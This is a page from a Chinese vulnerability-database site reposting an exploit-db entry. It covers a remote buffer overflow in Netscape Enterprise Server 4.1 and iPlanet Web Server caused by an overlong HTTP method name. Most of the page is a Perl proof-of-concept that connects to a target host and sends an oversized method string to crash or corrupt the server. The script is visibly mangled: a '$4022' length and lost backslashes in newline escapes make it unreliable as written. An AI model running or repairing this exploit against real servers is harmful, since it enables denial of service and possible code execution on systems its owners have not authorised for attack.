Netscape Enterprise Server 4.1 – HTTP Method Name Buffer Overflow

20次阅读
没有评论

Netscape Enterprise Server 4.1 – HTTP Method Name Buffer Overflow

漏洞ID 1053534 漏洞类型
发布时间 2001-05-19 更新时间 2001-05-19
Netscape Enterprise Server 4.1 - HTTP Method Name Buffer OverflowCVE编号 N/A
Netscape Enterprise Server 4.1 - HTTP Method Name Buffer OverflowCNNVD-ID N/A
漏洞平台 Multiple CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22230
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/6792/info

It has been reported that iPlanet Web Server and Netscape Enterprise Server are prone to a remotely exploitable buffer overflow condition. This is due to insufficient bounds checking when handling HTTP requests. 

This condition is reportedly triggered when an invalid HTTP 'method name' or URI request is handled by the vulnerable server. It is possible for remote attackers to corrupt sensitive regions of memory with attacker-supplied values, possibly resulting in execution of arbitrary code.

Code execution will occur in the security context of the vulnerable web server process.

#!/usr/bin/perl
use IO::Socket;
if (@ARGV < 2) {
print "Usage: host portn";
exit;
}
$overflow = "A" x $4022;
&connect;
sleep(15);
&connect;
exit;
################################################
sub connect() {
$sock= IO::Socket::INET->new(Proto=>"TCP",
PeerAddr=>$ARGV[0],
PeerPort=>"$ARGV[1]",)
or die "Cant connect to $ARGV[0]: $!n";
$sock->autoflush(1);
print $sock "$overflow /index.html HTTP/1.0nn";
$response=<$sock>;
print "$response";
while(<$sock>){
print "$_n";
}
close $sock;
}

相关推荐: Sendmail decode alias信息修改漏洞

Sendmail decode alias信息修改漏洞 漏洞ID 1207619 漏洞类型 未知 发布时间 1996-12-10 更新时间 1996-12-10 CVE编号 CVE-1999-0096 CNNVD-ID CNNVD-199612-007 漏洞平…

正文完
 0